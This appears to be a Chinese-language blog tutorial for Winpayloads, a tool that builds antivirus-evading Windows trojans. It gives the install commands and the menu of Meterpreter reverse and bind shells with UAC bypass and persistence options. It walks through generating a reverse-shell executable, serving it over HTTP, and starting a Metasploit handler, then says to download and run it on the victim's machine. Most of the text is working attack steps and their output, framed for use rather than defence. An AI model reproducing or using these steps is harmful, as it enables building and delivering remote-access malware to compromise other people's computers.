工具链接
https://github.com/nccgroup/Winpayloads
简介
Winpayloads 是一款制作免杀windows木马的工具
安装
下载
git clone https://github.com/nccgroup/Winpayloads.git
cd Winpayloads
安装
chmod +x setup.sh
./setup.sh
安装完后启动的样子
_ ___ ____ __ __
| | / (_)___ / __ \____ ___ __/ /___ ____ _____/ /____
| | /| / / / __ \/ /_/ / __ `/ / / / / __ \/ __ `/ __ / ___/
| |/ |/ / / / / / ____/ /_/ / /_/ / / /_/ / /_/ / /_/ (__ )
|__/|__/_/_/ /_/_/ \__,_/\__, /_/\____/\__,_/\__,_/____/
/____/NCCGroup - CharlieDean
===================================================================================================================================Main Menu==================================================================================================================================
1: Windows Reverse Shell
2: Windows Meterpreter Reverse Shell [uacbypass, persistence, allchecks]
3: Windows Meterpreter Bind Shell [uacbypass, persistence, allchecks]
4: Windows Meterpreter Reverse HTTPS [uacbypass, persistence, allchecks]
5: Windows Meterpreter Reverse Dns [uacbypass, persistence, allchecks]
ps: PowerShell Menu
stager: Powershell Interpreter Stager
clients: Connected Interpreter Clients
?: Print Detailed Help
back: Main Menu
exit: Exit
==============================================================================================================================================================================================================================================================================
Main Menu >
使用
比如你要生成一个Windows Meterpreter Reverse Shell
Main Menu > 2
[*] Press Enter For Default Port(4444)
[*] Port> 4444
[*] Press Enter To Get Local Ip Automatically(1.1.1.16)
[*] IP>
[*] IP SET AS 1.1.1.16
[*] PORT SET AS 4444
[*] Try UAC Bypass(Only Works For Local Admin Account)? y/[n]:y
[*] Creating Payload using Pyinstaller...
- Genera
[*] Payload.exe Has Been Generated And Is Located Here: /root/winpayloads/Windows_Meterpreter_Reverse_Shell.exe
[*] Upload To Local Websever or (p)sexec? [y]/p/n: y
[*] Serving Payload On http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v4.14.27-dev ]
+ -- --=[ 1659 exploits - 951 auxiliary - 293 post ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
payload => windows/meterpreter/reverse_tcp
LPORT => 4444
LHOST => 0.0.0.0
autorunscript => multi_console_command -rc uacbypass.rc
ExitOnSession => false
[*] Exploit running as background job.
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Starting the payload handler...
msf exploit(handler) >
在受害者机器上打开 http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe,之后运行就可以了
评价
其实不能做到完全免杀,可能是因为工具出来太久的缘故,但是生成木马的方式还是挺简单的值得一试
